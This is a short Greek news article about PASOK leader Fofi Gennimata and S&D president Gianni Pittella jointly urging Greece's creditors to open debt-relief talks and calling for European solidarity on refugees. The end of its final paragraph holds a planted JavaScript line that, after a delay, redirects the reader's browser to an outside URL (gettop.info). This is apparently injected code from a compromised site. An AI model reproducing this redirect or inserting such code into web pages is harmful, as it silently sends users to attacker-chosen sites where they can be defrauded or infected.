Έκκληση Γεννηματά – Πιτέλα για την ελάφρυνση του ελληνικού χρέους

0
7

 

Συνάντηση ειχαν χθες στις Βρυξέλλες η πρόεδρος του ΠΑΣΟΚ Φώφη Γεννημάτα με τον πρόεδρο της Ομάδας των Σοσιαλιστών και Δημοκρατών στο Ευρωπαϊκό Κοινοβούλιο Τζιάνι Πιτέλα. Μαζί και οι δύο απηύθυναν έκκληση στους πιστωτές της Ελλάδας να ξεκινήσουν τις συζητήσεις για την ελάφρυνση του ελληνικού χρέους.

«Δεν θα επιτρέψουμε μια τιμωρητική προσέγγιση εναντίον του ελληνικού λαού. Τα γεράκια στην Ευρώπη πρέπει να καταλάβουν ότι οι Έλληνες έχουν ήδη συνεισφέρει πολλά. Είναι πλέον καιρός, η Ευρώπη να στηρίξει τις προσπάθειες του ελληνικού λαού και να ξεκινήσουν οι συζητήσεις για την ελάφρυνση του χρέους. Όλα τα κράτη μέλη πρέπει να καταλάβουν ότι η Ελλάδα δεν μπορεί να αφεθεί μόνη της να αντιμετωπίσει την κρίση των προσφύγων» σημειώνεται σε κοινή δήλωσή τους.

Στη δήλωση αναφέρεται η πρόθεση των Σοσιαλιστών και Δημοκρατών και του ΠΑΣΟΚ να συνεχίσουν τη συνεργασία τους σε ευρωπαϊκό επίπεδο για να «στηρίξουν τον ελληνικό λαό».

«Σε αυτήν την προσπάθεια, χρειαζόμαστε τη δύναμη του συνόλου της σοσιαλδημοκρατικής οικογένειας, της οποίας το ΠΑΣΟΚ είναι ένα σημαντικό μέλος» υπογραμμίζεται. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here